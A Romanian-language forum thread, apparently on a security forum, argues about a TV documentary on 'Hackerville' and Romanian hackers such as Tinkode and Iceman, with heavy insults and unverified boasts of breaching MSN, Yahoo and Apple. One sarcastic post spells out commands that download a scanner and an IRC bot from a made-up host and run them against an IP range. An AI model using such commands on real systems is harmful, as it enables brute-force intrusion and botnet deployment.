Jump to content
Silviu

Romania, te iubesc! - Hackerville [Emisiune Full]

Recommended Posts

In min 8, nu inteleg cum a urcat el c99 intr'un site care are doar html :-?, sau a vrut sa arate ca stie sa foloseasca un shell si a invatat html?

Iceman sa-si cumpere 2-3 dinti macar de ziua lui(e astazi), si il rugam sa nu trimita rachete spre noi.

Tinkode, ti'e rusine sa recunosti ca ai facut blogul doar ca sa te lauzi!? Sa fim serios ai avut zeci de oferte cu salarii in zeci de mii de $ si le-ai refuzat pentru numele "Tinkode".

Ce mi-a placut la emisiunea a fost ca a facut diferenta dintre hackeri si hoti.

Edited by jetus
Link to comment
Share on other sites

Ce plm stati sa faceti ma filozofie?

Singura propozitie/idee reprezentativa tarii, din care deriva celelalte e: Romanii au prea mult sange in coaie(sau tupeu).

De aici si justitia care nu poate face fata fenomenului, etc. Ca romanii sunt saraci si prosti, ca unii isi baga linux pe un pc care costa cat casa, e alta treaba.

Link to comment
Share on other sites

Ce nu inteleg eu, de cand un xss inseamna ca ai spart un server, l-am vazut pe majestatea sa, iluminatul Tinkode, care spunea ca a spart MSN/YAHOO/GOOGLE/YOUTUBE/APPLE...

dragul meu, e un xss, si in majoritatea cazurilor este si useless

Am a?teptat pu?in s? ar?t ce efect de turm? poate exista pe RST. P?rerea mea personal? ar fi aceea ca ?ia care nu au f?cut mai nimic, care critic? c? sunt o nonvaloare, care î?i permit s? îmi dea mie lec?ii de via?? despre ce ar trebui s? fac, c? ei ?tiu programare, c? au de zeci de ori mai multe cuno?tin?e ca mine, sau c? nu trebuia s? caut faim?... le-a? trasmite s? se uite în oglind?.

Voi ??tia care sunte?i în umbr?, ce a?i realizat? Cu ce a?i ie?it în eviden??? A?i creat voi ceva revolu?ionar de v? sim?i?i capabili s? jigni?i ?i s? aduce?i injurii? Nu cred. Sunte?i doar ni?te copii plini de invidie. A fost pur ?i simplu o emisiune cu persoane care au f?cut anumite lucruri ?i care au primit o ofert? de a lua parte la reportaj s? î?i spun? povestea. Da. Eu am una. TU AI?

Acum o s? vin? unu, si o s? spun? c? eu îmi doresc ca to?i s? m? pupe în "pe obraz", dar sincer, aici o face vreunul? Adic? e anormal s? fii mândru c? cineva ?i-a pus ?ara pe hart? într-un domeniu, dar e normal s? îl jignim, s? ne d?m noi to?i super de?tep?i. În loc s? existe sus?inere între voi, s? face?i România cât mai cunoscut?, s? v? mândri?i c? sunte?i români, voi v? înjura?i s? p?re?i ni?te vulturi, dar defapt sunte?i doar ni?te g?ini. Sunt dezgustat maxim.

Acum, ElGriffin sau Benny_Loppa, cum ?i-am mai repetat de c?teva ori. De ce tot încerci s? ar??i lumii ceva ce nu e adev?rat? Ce ai de câ?tigat? Te sim?i în al nou?lea cer c? î?i dau dreptate cei care posteaz? de pe alte conturi c? nu au curaj de pe cel oficial?

Sincer mai exist? ?i www.archive.org... ca s? se verifice dac? ai dreptate sau nu.

MSN - Nu am g?sit doar XSS. Am luat access la servere de ale lor. La baze de date. La Yahoo, acela?i lucru, am avut peste 4 subdomenii. În HoF Google, nu am ajuns pentru XSS, sau vulnerabilit??i derivate din XSS. Youtube. Da a fost un XSS. Dar acea vulnerabilitate de tip XSS (permanent) a fost numit? cea mai grav? din istoria YouTube-ului. Iar la Apple.com - Aveam access la DB, sau Root access!

?i ca s? evit?m din nou reply-urile în care spui c? mint, verific? cu site-ul subliniat anterior vechiile mele bloguri.

Sincer, înceta?i s? mai fi?i penibili.

Edited by Stealth2
Link to comment
Share on other sites

Scuzati-mi ignoranta, da' tare ma mira faptul ca iceman sau cum ii zice clujanului e hacker, in conditiile in care nu prea le are cu romana si nici cu engleza :) Sau cu alte chestii relativ importante :D

Cum sa fii h4x0r: (pentru cazul evidentiat de tine)

wget sunth4x0r.cc.nz.m0l0Z.plm/Sc4nn3r2oi3.tgz

tar xzvf Sc4nn3r2oi3.tgz

cd Sc4nn3r2oi3

./scan 20.13

----------------------------------------------

Toata dragostea mea pentru diavola!

----------------------------------------------

L-am PrinS de piCioru Stang -> test:test:20.13.13.1

#### cu varianta:

wget sunth4x0r.cc.nz.m0l0Z.plm/b0tzy.tgz

tar xzvf b0tzy.tgz

cd b0tzy

./emech

##

Chiar asa imposibil pare ca oricine sa fie h4x0r in ziua de azi(si mai ales acu multi ani cand era o vorba: Daca prostii ar zbura, IRC-ul ar fi aeroport)?

Edited by Cril
Link to comment
Share on other sites

ma nu am vazut emisiunea, sunt sigur ca nu am pierdut nimic.totul e istorie deja, ne pierdem timpul in loc sa vedem ce facem in viitor.care viitor..dupa cum observati, numai e asa de simplu in ceea ce priveste frauda electronica.la munca nu l a furat conturi.lasatii pe aia din asia sa si bata capul.noi suntem.. prea mici pentru asa ceva.vietnam ftw!!

Link to comment
Share on other sites

ma nu am vazut emisiunea, sunt sigur ca nu am pierdut nimic.totul e istorie deja, ne pierdem timpul in loc sa vedem ce facem in viitor.care viitor..dupa cum observati, numai e asa de simplu in ceea ce priveste frauda electronica.la munca nu l a furat conturi.lasatii pe aia din asia sa si bata capul.noi suntem.. prea mici pentru asa ceva.vietnam ftw!!

iti spun eu ca 2 valceni fac , cat 100 de vitnamezi pe ebay :)))))))

Link to comment
Share on other sites

Si asa e felul nostru de roman de a critica orice si pe oricine. Tinkode a avut xss-uri ( sqli pula mea ) nu ma intereseaza dar, voi chiar credeti ca il doare in pula pe el ca voi il comentati pe un forum ? a adus Romania in top ( nu conteaza ca ceea ce a facut el a fost din noroc sau chiar a fost bun in ceea ce face ) si nu ii tin apararea sau ceva ca ar fi el cel mai mare h4xor de [e planeta pentru ca adevarata lume underground nu se rezuma la un forum si niste skiddies care dau scan si plm . Despre iceman ? eu nu stiu care e rostul sa il criticati si pe el ? Omu are un iq foarte mic, dar asa prost cum este el o fii avand alta varianta in aceasta viata de a face ceva mai important ? A dat scan , s-a ales cu o amenda de nu stiu cati euro a aparut la TV. Da este o realizare pentru el pentru ca altceva nu stia ce sa faca. Si revenind la critici si de astea. Fiecare isi aseaza locul unde doarme si .

Link to comment
Share on other sites

Are, este demonstrat stiintific ca o persoana cu cat e mai inteligenta cu atat e mai preocupata de igiena personala.

Asta e cel mai stupid si prostesc lucru care l-am citit pe ziua de azi. Bai eu nu inteleg ce importanta are infatisarea, nu era jegos si nu avea lucrurile rupte. Da este adevarat Iceman nu arata a Brad Pitt si nu avea o dictie buna si comunica deficitar, dar tocmai asta este ideea, in lumea virtuala toate aceste lucruri de care lumea este asa inebunita aici nu conteaza.

Link to comment
Share on other sites

Initial nu am vrut sa postez dar apoi inteligenta unui user m-a uimit.

Parerea mea personala vis-a-vis de subiect este ca emisiunea a fost realizata pentru retardati, in stilul pseudo-emisiunilor actuale...

Si povestea poate continua cu majoritatea posturilor. Please, stop. Emisiunea a fost ratatata, nu mai fiti ratati discutand pe seama ei.

Dom' fulminator, lurea fiecarui paragraf la rand si comentatul inutil la el nu este necesara, dar ca sa arati ca orezul iti sta in coaste lipit cu lapte, ai adus in vorba niste studii stiintifice.

Ca sa-ti arat ca nu numai tu stii sa imparti paragrafele, voi incerca sa fiu macar pe juma' de bun pe cat esti tu.

Ce relevanta are faptul ca ala n-are dinti in gura ?

Are, este demonstrat stiintific ca o persoana cu cat e mai inteligenta cu atat e mai preocupata de igiena personala.

'Bre Gigi, spune-mi si mie, daca media implementeaza ideea de a-ti perfectiona tinuta si igiena personala, asta inseamna ca daca iti lipseste un maxilar esti automat un bou? Lumineaza-ma, dar nu uita, introdu un studiu "stiintific". Apropo, e mai mult psihologic sau sociologic dar hai, nu tu esti priceputul?

Ce relevanta are faptul ca sta prost cu dictia, cati pula mea dintre voi ati vorbi ma cursiv urmariti de o camera de luat vederi, iesit din puscarie, cu presiune pe umeri si toti ochii atintiti asupra voastra ?

Te-ai duce sa vorbesti tu cu "tifosele" tale, tu care nu ai facut nici 1% din ce a facut analfabetul ala de Iceman?

Felicitari, ai reusit sa-l faci de cacat folosind procente. Cine mai poate face una ca asta? Daca dom' Iceman e analfabet, atunci acea persoana cu nici 1% ar fi microanalfabet? Se pare ca nu esti bun numai la stiinte, te pricepi si la matematica.

Acum ca sa-mi inchei post-ul, iti urez bafta in studii stiinfice, dar nu uita, n-are rost sa te chinui cu aia ca mine de pe RST.

Aaa, era sa uit, "please stop"

Link to comment
Share on other sites

Am a?teptat pu?in s? ar?t ce efect de turm? poate exista pe RST. P?rerea mea personal? ar fi aceea ca ?ia care nu au f?cut mai nimic, care critic? c? sunt o nonvaloare, care î?i permit s? îmi dea mie lec?ii de via?? despre ce ar trebui s? fac, c? ei ?tiu programare, c? au de zeci de ori mai multe cuno?tin?e ca mine, sau c? nu trebuia s? caut faim?... le-a? trasmite s? se uite în oglind?.

Voi ??tia care sunte?i în umbr?, ce a?i realizat? Cu ce a?i ie?it în eviden??? A?i creat voi ceva revolu?ionar de v? sim?i?i capabili s? jigni?i ?i s? aduce?i injurii? Nu cred. Sunte?i doar ni?te copii plini de invidie. A fost pur ?i simplu o emisiune cu persoane care au f?cut anumite lucruri ?i care au primit o ofert? de a lua parte la reportaj s? î?i spun? povestea. Da. Eu am una. TU AI?

Acum o s? vin? unu, si o s? spun? c? eu îmi doresc ca to?i s? m? pupe în "pe obraz", dar sincer, aici o face vreunul? Adic? e anormal s? fii mândru c? cineva ?i-a pus ?ara pe hart? într-un domeniu, dar e normal s? îl jignim, s? ne d?m noi to?i super de?tep?i. În loc s? existe sus?inere între voi, s? face?i România cât mai cunoscut?, s? v? mândri?i c? sunte?i români, voi v? înjura?i s? p?re?i ni?te vulturi, dar defapt sunte?i doar ni?te g?ini. Sunt dezgustat maxim.

Acum, ElGriffin sau Benny_Loppa, cum ?i-am mai repetat de c?teva ori. De ce tot încerci s? ar??i lumii ceva ce nu e adev?rat? Ce ai de câ?tigat? Te sim?i în al nou?lea cer c? î?i dau dreptate cei care posteaz? de pe alte conturi c? nu au curaj de pe cel oficial?

Sincer mai exist? ?i Internet Archive: Digital Library of Free Books, Movies, Music & Wayback Machine... ca s? se verifice dac? ai dreptate sau nu.

MSN - Nu am g?sit doar XSS. Am luat access la servere de ale lor. La baze de date. La Yahoo, acela?i lucru, am avut peste 4 subdomenii. În HoF Google, nu am ajuns pentru XSS, sau vulnerabilit??i derivate din XSS. Youtube. Da a fost un XSS. Dar acea vulnerabilitate de tip XSS (permanent) a fost numit? cea mai grav? din istoria YouTube-ului. Iar la Apple.com - Aveam access la DB, sau Root access!

?i ca s? evit?m din nou reply-urile în care spui c? mint, verific? cu site-ul subliniat anterior vechiile mele bloguri.

Sincer, înceta?i s? mai fi?i penibili.

Si brusc, tipul care era cu "ai pus o virgula gresita! BAN RATATULE" pe acest forum si: "M-ai injurat pe mess?... wow... iti sparg haidiul si calculatorul etc" a devenit persoana cu bun simt, respect si cu un vocabular adecvat unui om civilizat... Am auzit un nou cuvant: sa ma pupi in "pe obraz"... Se zice CUR ba tinK?! C . U. R .

Daca aveai acest respect de la inceput fata de alte persoane, primeai acum incurajare si sustinere morala. Toti te "iubeau" pentru ce ai facut... Dar din pacate ai suferit de Tinkodisme si ai dat gres. Ai fost arestat, ti-au aflat toti numele real, ai aparut la tv, ai aparut la romania te iubesc, toata lumea stie cum arati (nu cum ziceai tu ca arati). Probabil ziceai ca arati un mare muschiulos cu par pe spate, dar defapt: "Un copil imoral, cu scris urat scos in fata tablei, panicat etc"

Pa!

Link to comment
Share on other sites

Nu inchideti ne mai ridem si noi un pic :)) oricum iceman penal de tot sa mor (zici ca el a pus coada la pruna) in schimb sper ca au inceles toti diferenta intre hackeri, hotii si laudarosi :))

Singurul care a fost prezentabil in toata emisiunea a fost Andrei si domnul reporter cind umbla pe blocuri ma spart de tot cite cabluri tv atirnau si dezordinea pe bloc , si inca ceva in Hackerville :)) numai analfabeti macar eu am o scuza cind mai gresesc scrisul pe forum :)

Edited by neox
Link to comment
Share on other sites

Am a?teptat pu?in s? ar?t ce efect de turm? poate exista pe RST. P?rerea mea personal? ar fi aceea ca ?ia care nu au f?cut mai nimic, care critic? c? sunt o nonvaloare, care î?i permit s? îmi dea mie lec?ii de via?? despre ce ar trebui s? fac, c? ei ?tiu programare, c? au de zeci de ori mai multe cuno?tin?e ca mine, sau c? nu trebuia s? caut faim?... le-a? trasmite s? se uite în oglind?.

Voi ??tia care sunte?i în umbr?, ce a?i realizat? Cu ce a?i ie?it în eviden??? A?i creat voi ceva revolu?ionar de v? sim?i?i capabili s? jigni?i ?i s? aduce?i injurii? Nu cred. Sunte?i doar ni?te copii plini de invidie. A fost pur ?i simplu o emisiune cu persoane care au f?cut anumite lucruri ?i care au primit o ofert? de a lua parte la reportaj s? î?i spun? povestea. Da. Eu am una. TU AI?

Acum o s? vin? unu, si o s? spun? c? eu îmi doresc ca to?i s? m? pupe în "pe obraz", dar sincer, aici o face vreunul? Adic? e anormal s? fii mândru c? cineva ?i-a pus ?ara pe hart? într-un domeniu, dar e normal s? îl jignim, s? ne d?m noi to?i super de?tep?i. În loc s? existe sus?inere între voi, s? face?i România cât mai cunoscut?, s? v? mândri?i c? sunte?i români, voi v? înjura?i s? p?re?i ni?te vulturi, dar defapt sunte?i doar ni?te g?ini. Sunt dezgustat maxim.

Acum, ElGriffin sau Benny_Loppa, cum ?i-am mai repetat de c?teva ori. De ce tot încerci s? ar??i lumii ceva ce nu e adev?rat? Ce ai de câ?tigat? Te sim?i în al nou?lea cer c? î?i dau dreptate cei care posteaz? de pe alte conturi c? nu au curaj de pe cel oficial?

Sincer mai exist? ?i Internet Archive: Digital Library of Free Books, Movies, Music & Wayback Machine... ca s? se verifice dac? ai dreptate sau nu.

MSN - Nu am g?sit doar XSS. Am luat access la servere de ale lor. La baze de date. La Yahoo, acela?i lucru, am avut peste 4 subdomenii. În HoF Google, nu am ajuns pentru XSS, sau vulnerabilit??i derivate din XSS. Youtube. Da a fost un XSS. Dar acea vulnerabilitate de tip XSS (permanent) a fost numit? cea mai grav? din istoria YouTube-ului. Iar la Apple.com - Aveam access la DB, sau Root access!

?i ca s? evit?m din nou reply-urile în care spui c? mint, verific? cu site-ul subliniat anterior vechiile mele bloguri.

Sincer, înceta?i s? mai fi?i penibili.

Bai rablo, tu ai pus tara pe harta intr-o pozitie negativa, nu e ceva cu ce ar trebui sa te mandresti. Tu nu ai facut mare branza, doar ai gasit ceva ce n-au cautat altii din cauza consecintelor. De exploatat stiau mai multi dar nimeni nu s-a complicat.Tu ai facut ce ai facut si uite unde ai ajuns? Ai ajuns pe la tribunale si ai o pata la dosar. Cine isi doreste asta? Vad ca zici de ceva revolutionar.. tu ce cacat ai creat revolutionar? Ai schimbat internetul sau ceva cu descoperirile tale? Nu cred, deja lumea te-a uitat ca ai avut tu acces la NASA si la altele.

Vad ca o dai in diacritice, in opinia mea trebuia sa stai macar 1-2 ani la racoare.

Pentru restu' : Nu-l mai venerati atat, ca ati vazut la stiri cine e cata scoala are si nu-i un om care ar trebui admirat.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...